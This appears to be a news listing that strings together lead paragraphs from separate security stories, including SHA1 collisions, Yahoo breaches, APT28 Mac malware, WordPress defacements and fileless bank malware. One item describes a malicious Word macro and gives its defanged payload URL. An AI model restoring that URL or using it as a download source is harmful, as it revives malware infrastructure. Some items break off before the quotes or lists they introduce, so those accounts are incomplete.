Frank Abagnale is world-famous for pretending to be other people. The former teenage con-man, whose exploits 50 years ago became a Leonardo DiCaprio film called Catch Me If You Can, has built a lifelong career as a security consultant and advisor to the FBI and other law enforcement agencies. So it's perhaps ironic that four and a half years ago, his identity was stolen—along with those of 3.6 million other South Carolina taxpayers.
"When that occurred," Abagnale recounted to Ars, "I was at the FBI office in Phoenix. I got a call from [a reporter at] the local TV news station, who knew that my identity was stolen, and they wanted a comment. And I said, 'Before I make a comment, what did the State Tax Revenue Office say?' Well, they said they did nothing wrong. I said that would be absolutely literally impossible. All breaches happen because people make them happen, not because hackers do it. Every breach occurs because someone in that company did something they weren't supposed to do, or somebody in that company failed to do something they were supposed to do." As it turned out (as a Secret Service investigation determined), a government employee had taken home a laptop that shouldn't have left the office and connected it—unprotected—to the Internet.
Government breaches of personal information have become all too common, as demonstrated by the impact of the hacking of the Office of Management and Budget's personnel records two years ago. But another sort of organization is now in the crosshairs of criminals seeking identity data to sell to fraudsters: doctors' offices. Abagnale was in Orlando this week to speak to health IT professionals at the 2017 HIMSS Conference about the rising threat of identity theft through hacking medical records—a threat made possible largely because of the sometimes haphazard adoption of electronic medical records systems by health care providers.
For more than six years, the SHA1 cryptographic hash function underpinning Internet security has been at death's door. Now it's officially dead, thanks to the submission of the first known instance of a fatal exploit known as a "collision."
Despite more than a decade of warnings about the lack of security of SHA1, the watershed moment comes as the hash function remains widely used. Git, the world's most widely used system for managing software development among multiple people, relies on it for data integrity. The GnuPG e-mail encryption program still deems SHA1 safe. And hundreds if not thousands of big-name software packages rely on SHA1 signatures to ensure installation and update files distributed over the Internet haven't been maliciously altered.
A collision occurs when the two different files or messages produce the same cryptographic hash. The most well-known collision occurred sometime around 2010 against the MD5 hash algorithm, which is even weaker than SHA1. A piece of nation-sponsored espionage malware known as Flame used the attack to hijack the Windows update mechanism Microsoft uses to distribute patches to hundreds of millions of customers. By forging the digital signature used to cryptographically prove the authenticity of Microsoft servers, Flame was able to spread from one infected computer to another inside targeted networks.
Some five months after Yahoo disclosed a security breach that exposed sensitive data for 500 million accounts, some of its systems remained compromised, according to a report published Tuesday. The report said that in light of the hacks, Verizon would knock $350 million off the price it would pay to acquire Yahoo's Internet business.
"A recent meeting between technical staff of the two companies revealed that some of Yahoo’s systems were compromised and might be difficult to integrate with Verizon’s AOL unit," The Wall Street Journal reported, citing unnamed people. Verizon remains concerned that the breaches may hamper user engagement and in the process make the assets less valuable. Yahoo responded by cutting $350 million from the original $4.83 billion price tag, bringing the deal value to about $4.48 billion. It wasn't clear precisely when the meeting occurred.
In a release issued jointly by Yahoo and Verizon, the companies said neither the breaches nor any losses arising from them will be taken into account in determining whether a "Business Material Adverse Effect" has occurred or whether certain closing conditions have been satisfied. In addition to the $350 million price cut, the companies agreed to split the costs of responding to the breaches.
Researchers have uncovered an advanced malware-based operation that siphoned more than 600 gigabytes from about 70 targets in a broad range of industries, including critical infrastructure, news media, and scientific research.
The operation uses malware to capture audio recordings of conversations, screen shots, documents, and passwords, according to a blog post published last week by security firm CyberX. Targets are initially infected using malicious Microsoft Word documents sent in phishing e-mails. Once compromised, infected machines upload the pilfered audio and data to Dropbox, where it's retrieved by the attackers. The researchers have dubbed the campaign Operation BugDrop because of its use of PC microphones to bug targets and send the audio and other data to Dropbox.
"Operation BugDrop is a well-organized operation that employs sophisticated malware and appears to be backed by an organization with substantial resources," the CyberX researchers wrote. "In particular, the operation requires a massive back-end infrastructure to store, decrypt, and analyze several GB per day of unstructured data that is being captured from its targets. A large team of human analysts is also required to manually sort through captured data and process it manually and/or with Big Data-like analytics."
Representative Ted Lieu, a congressman from Los Angeles County, California, led fourteen other House Democrats on Friday in urging the House Government Oversight Committee to investigate "troubling reports" of President Donald Trump's apparently poor security practices and the potential danger to national security posed by them—including his continued use of an unsecured Android device to post to Twitter, discussion of sensitive information (including nuclear strategy) in the restaurant at his Mar-A-Lago resort, and leaving classified material unlocked while visitors were in the Oval Office.
In a letter to Oversight Committee chairman Jason Chaffetz and ranking Democratic member Elijah Cummings, the fifteen representatives wrote:
Referring to the complex problem of cybersecurity, President Trump recently said in an interview, "I’m not sure you have the kind of security that you need." We fully agree—which is why we are writing to request that the House Oversight and Government Reform Committee hold a hearing into troubling reports that the President is jeopardizing national security by egregiously failing to implement commonsense security measures across the board, from using an insecure, consumer-grade Android smartphone to discussing nuclear strategy openly in a dining room at his Mar-a-Lago Club in Florida. Cybersecurity experts universally agree that an ordinary Android smartphone, which the President is reportedly using despite repeated warnings from the Secret Service, can be easily hacked.
Lieu and the other signatories of the letter expressed concern that Trump's Android device, "most likely the Samsung Galaxy S3," is particularly vulnerable to attack, and that someone could alter the information the President viewed on it—which could "have a huge impact on his beliefs and actions." They also feared that someone could gain control of his Twitter account, "causing disastrous consequences for global stability," or use it as a listening device to pick up sensitive conversations.
Someone calling themselves "Pro_Mast3r" managed to deface a server associated with President Donald Trump's presidential campaign fundraising on Sunday, The server, secure2.donaldjtrump.com, is behind Cloudflare's content management and security platform, and does not appear to be directly linked from the Trump Pence campaign's home page. But it does appear to be an actual Trump campaign server—its certificate is legitimate, but a reference to an image on another site is insecure, prompting a warning on Chrome and Firefox that the connection is not secure.
The page, now displaying an image of a man in a fedora, displays the following text:
Hacked By Pro_Mast3r ~
Nothing Is Impossible
Peace From Iraq
In a presentation at this week's RSA security conference in San Francisco, researchers from Kaspersky Labs revealed more bad news for the Internet of drivable things—connected cars. Malware researchers Victor Chebyshev and Mikhail Kuzin examined seven Android apps for connected vehicles and found that the apps were ripe for malicious exploitation. Six of the applications had unencrypted user credentials, and all of them had little in the way of protection against reverse-engineering or the insertion of malware into apps.
The security vulnerabilities of connected cars have been a hot topic at security conferences for the past few years—particularly after researchers Charlie Miller and Chris Valasek demonstrated that they could control many of the functions of a Jeep Grand Cherokee (including its brakes and steering) remotely through the vehicle's built-in cellular data connection. There have also been repeated demonstrations of vulnerabilities in how the mobile applications from various connected vehicle services connect to vehicles, such as Sammy Kamkar's demonstration of intercepting data from the mobile app for GM's OnStar.
The vulnerabilities looked at by the Kaspersky researchers focused not on vehicle communication, but on the Android apps associated with the services and the potential for their credentials to be hijacked by malware if a car owner's smartphone is compromised. Chebyshev and Kuzin wrote:
Remember the USB Killer stick that indiscriminately and immediately fries about 95 percent of devices? Well, now the company has released a new version that is even more lethal! And you can also buy an adaptor pack, which lets you kill test devices with USB-C, Micro USB, and Lightning ports. Yay.
If you haven't heard of the USB Killer before, it's essentially a USB stick with a bunch of capacitors hidden within. When you plug it into a host device (a smartphone, a PC, an in-car or in-plane entertainment system), those capacitors charge up—and then a split second later, the stick dumps a huge surge of electricity into the host device, at least frying the port, but usually disabling the whole thing. For more information on its technical operation, read our original USB Killer explainer.
Yahoo has sent out another round of notifications to users, warning some that their accounts may have been breached as recently as last year. The accounts were affected by a flaw in Yahoo's mail service that allowed an attacker—most likely a "state actor," according to Yahoo—to use a forged "cookie" created by software stolen from within Yahoo's internal systems to gain access to user accounts without a password.
Yahoo informed some users in e-mails this week that "Based on the ongoing investigation, we believe a forged cookie may have been used in 2015 or 2016 to access your account." The messages are regarding possible breaches using the cookie vulnerability in 2014.
The Associated Press' Raphael Satter reports that a Yahoo spokesperson acknowledged the company was notifying users of the potential breach of their accounts, but would not disclose how many users were affected.
Two Republican members of Congress sent a formal letter Tuesday to the Environmental Protection Agency’s Office of the Inspector General, expressing concern that “approximately a dozen career EPA officials” are using the encrypted messaging app Signal to covertly plan strategy and may be running afoul of the Freedom of Information Act.
The open source app has gained renewed interest in the wake of the election of President Donald Trump.
As Ars has reported previously, all Signal messages and voice calls are end-to-end encrypted using the Signal Protocol, which has since been adopted by WhatsApp and other companies. However, unlike other messaging apps, Signal’s maker, Open Whisper Systems, makes a point of not keeping any data, encrypted or otherwise, about its users. (WhatsApp also does not retain chat history but allows for backups using third-party services, like iCloud, which allows for message history to be restored when users set up a new device. Signal does not allow messages to be stored with a third party.)
The letter was written by Rep. Lamar Smith (R-Texas) and Rep. Darin LaHood (R-Ill.), who are the chair of the Committee on Science, Space, and Technology and the chair of the subcommittee on Oversight, respectively.
The congressmen note that the EPA has previously examined employee use of text messages to conduct government business and found that only a minuscule fraction of those messages was retained under FOIA.
“Not only does this demonstrate the vast issues presented with using text messages to conduct official business, but raises additional concerns about using messaging applications to conduct official business, which make it virtually impossible for the EPA to preserve and retain the records created in this manner to abide by federal record-keeping requirements,” they concluded.
The two republicans gave the agency until February 28 to respond.
The EPA OIG did not immediately respond to Ars’ request for comment.
UPDATE 5:49pm ET: Jennifer Kaplan, Deputy Assistant Inspector General for Congressional and Public Affairs, e-mailed: "In response to your inquiry below, the EPA OIG takes all congressional requests seriously. This request is under review by the Inspector General and his senior leadership team."
For a decade, every major operating system has relied on a technique known as address space layout randomization to provide a first line of defense against malware attacks. By randomizing the computer memory locations where application code and data are loaded, ASLR makes it hard for attackers to execute malicious payloads when exploiting buffer overflows and similar vulnerabilities. As a result, exploits cause a simple crash rather than a potentially catastrophic system compromise.
APT28, the Russian hacking group tied to last year's interference in the 2016 presidential election, has long been known for its advanced arsenal of tools for penetrating Windows, iOS, Android, and Linux devices. Now, researchers have uncovered an equally sophisticated malware package the group used to compromise Macs.
Like its counterparts for other platforms, the Mac version of Xagent is a modular backdoor that can be customized to meet the objectives of a given intrusion, researchers from antivirus provider Bitdefender reported in a blog post published Tuesday. Capabilities include logging passwords, snapping pictures of screen displays, and stealing iOS backups stored on the compromised Mac.
The discovery builds on the already considerable number of tools attributed to APT28, which other researchers call Sofacy, Sednit, Fancy Bear, and Pawn Storm. According to researchers at CrowdStrike and other security firms, APT28 has been operating since at least 2007 and is closely tied to the Russian government. An analysis Bitdefender published last year determined APT28 members spoke Russian, worked mostly during Russian business hours, and pursued targets located in Ukraine, Spain, Russia, Romania, the US, and Canada.
Over the course of the last year, a number of human rights organizations, labor unions, and journalists were targeted in a "phishing" campaign that attempted to steal the Google credentials of targets by luring them into viewing documents online. The campaign, uncovered by Amnesty International, is interesting largely because of the extent to which whoever was behind the attack used social media to create a complete persona behind the messages—a fictional rights activist named Safeena Malik.
Malik translates from Arabic as "King," so Amnesty International refers to the spear-phishing campaign in a report posted to Medium today as "Operation Kingphish."
The party or parties behind the operation created Facebook, Google, LinkedIn, and Twitter profiles for "Safeena Malik" using a young woman's photos, which were apparently harvested from another social media account. "It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile," wrote Nex, a security researcher working with Amnesty International, "along with a professional biography also stolen from yet another person."
Researchers have recently developed the first reliable technique for websites to track visitors even when they use two or more different browsers. This shatters a key defense against sites that identify visitors based on the digital fingerprint their browsers leave behind.
State-of-the-art fingerprinting techniques are highly effective at identifying users when they use browsers with default or commonly used settings. For instance, the Electronic Frontier Foundation's privacy tool, known as Panopticlick, found that only one in about 77,691 browsers had the same characteristics as the one commonly used by this reporter. Such fingerprints are the result of specific settings and customizations found in a specific browser installation, including the list of plugins, the selected time zone, whether a "do not track" option is turned on, and whether an adblocker is being used.
Until now, however, the tracking has been limited to a single browser. This constraint made it infeasible to tie, say, the fingerprint left behind by a Firefox browser to the fingerprint from a Chrome or Edge installation running on the same machine. The new technique—outlined in a research paper titled (Cross-)Browser Fingerprinting via OS and Hardware Level Features—not only works across multiple browsers, it's also more accurate than previous single-browser fingerprinting.
This weekend, as news of a ballistic missile launch by the Democratic People's Republic of Korea (North Korea) reached President Donald Trump and Japanese Prime Minister Shinzo Abe, President Trump got on his phone, and Abe consulted with staff. This didn't happen behind closed doors, however; it took place as members of Trump's Mar-A-Lago Club watched on in the resort's dining room. One club member even posed for photos with Trump's aide-de-camp—the Air Force major carrying the president's "nuclear football"—and posted pics of the scrum around Trump's table on Facebook.
Trump is comfortable conducting business over a meal. Last month, Trump approved a raid by US Navy SEALs in Yemen on an Al Qaeda compound not after a briefing in the White House situation room but rather over dinner with senior officials. These and other details of how the new president and his administration operate suggest that despite hitting Hillary Clinton hard for her security foibles, the Trump White House is not big on operational security (opsec).
President Trump may not be making phone calls on his old, vulnerable Android device, but he keeps it close at hand. He regularly posts to Twitter from his Samsung phone based on his Twitter metadata. And we know he's using an unsecured Android device because the secure one he's been issued wouldn’t even allow Twitter to be installed.
Attacks on websites running an outdated version of WordPress are increasing at a viral rate. Almost 2 million pages have been defaced since a serious vulnerability in the content management system came to light nine days ago. The figure represents a 26 percent spike in the past 24 hours.
A rogues' gallery of sites have been hit by the defacements. They include conservative commentator Glenn Beck's glennbeck.com, Linux distributor Suse's news.opensuse.org, the US Department of Energy-supported jcesr.org, the Utah Office of Tourism's travel.utah.gov, and many more. At least 19 separate campaigns are participating and, in many cases, competing against each other in the defacements. Virtually all of the vandalism is being carried out by exploiting a severe vulnerability WordPress fixed in WordPress version 4.7.2, which was released on January 26. In an attempt to curb attacks before automatic updates installed the patch, the severity of the bug—which resides in a programming interface known as REST—wasn't disclosed until February 1.
Encrypted connections established by at least 949 of the top 1 million websites are leaking potentially sensitive data because of a recently discovered software vulnerability in appliances that stabilize and secure Internet traffic, a security researcher said Thursday.
The bug resides in a wide range of firewalls and load balancers marketed under the F5 BIG-IP name. By sending specially crafted packets to vulnerable sites, an attacker can obtain small chunks of data residing in the memory of connected Web servers. The risk is that by stringing together enough requests, an attacker could obtain cryptographic keys or other secrets used to secure HTTPS sessions end users have established with the sites, security researcher Filippo Valsorda told Ars. He didn't identify the sites that tested positive in his scans, but results returned by a publicly available tool included with his vulnerability disclosure included the following:
Update: A little more than three hours after this post went live, a representative with Appnexus said its adnx.com domain was no longer vulnerable. A day later, official with MercadoLibre and clarin.com said F5 appliances for their networks were also fixed.
Malicious Microsoft Word documents that abuse macros have long been the bane of Windows users. Now, security researchers have found what may be the first such real-world attack to infect Macs.
The attack was found in a Word file titled "U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace." When Mac users open the document in a Word application configured to allow macros and ignore a warning, an embedded macro automatically:
- checks to make sure the LittleSnitch security firewall isn't running
- downloads an encrypted payload from hxxps://www.securitychecking.org:443/index.asp
- decrypts the payload using a hard-coded key and
- executes the payload
The code contained in the macro is written in the Python programming language. It was taken almost verbatim from EmPyre, an open-source exploit framework for Macs. By the time the researchers found the booby-trapped document, the securitychecking.org was no longer serving the payload, so it wasn't possible to know precisely what it did. But the Empyre component the macro borrowed allowed for persistent infections that contained a wide range of capabilities, including monitoring webcams, stealing passwords and encryption keys stored in the keychain, and accessing browsing histories.
White House Press Secretary Sean Spicer has gotten a lot of grief from some quarters for a variety of reasons. Among them are his problems with information security—including his apparent posting of passwords to his Twitter account. But the latest privacy problem Spicer has on the Internet is one that thousands of others who have embraced the Internet have had, and it's mostly the fault of the Internet's archaic address book associated with the Domain Name System: a little thing we call WHOIS.
In 2009, Spicer registered a domain for his personal blog—seanspicer.com. He updated his domain registration data in March of 2010, apparently after moving into his home in Alexandria, Virginia. And when he did, he used his own personal home address, phone number, and e-mail account. That information, as Mashable reported on February 6, is still publicly accessible through a whois lookup against the Domain Name Service, as published by his domain registrar GoDaddy. The phone number matches one associated with Spicer present in the DNC e-mail breach posted by WikiLeaks.
Spicer's Yahoo e-mail account—which was part of data exposed in the MySpace, Dropbox and LinkedIn "mega-breaches" discovered in 2016—is also associated with a number of other domains, including those bearing the name of family members. These sites have largely been taken down (as in the case of theelephanttrunk.org, a Republican-themed online tie store), are still essentially blank template sites (including stateoftherace.org), or are parked. The parked domains include:
Two years ago, researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen. Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Kaspersky eventually unearthed evidence that Duqu 2.0, as the never-before-seen malware was dubbed, was derived from Stuxnet, the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran’s nuclear program.
Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShell, Metasploit, and Mimikatz—to inject the malware into computer memory.
"What's interesting here is that these attacks are ongoing globally against banks themselves," Kaspersky Lab expert Kurt Baumgartner told Ars. "The banks have not been adequately prepared in many cases to deal with this." He went on to say that people behind the attacks are "pushing money out of the banks from within the banks," by targeting computers that run automatic teller machines.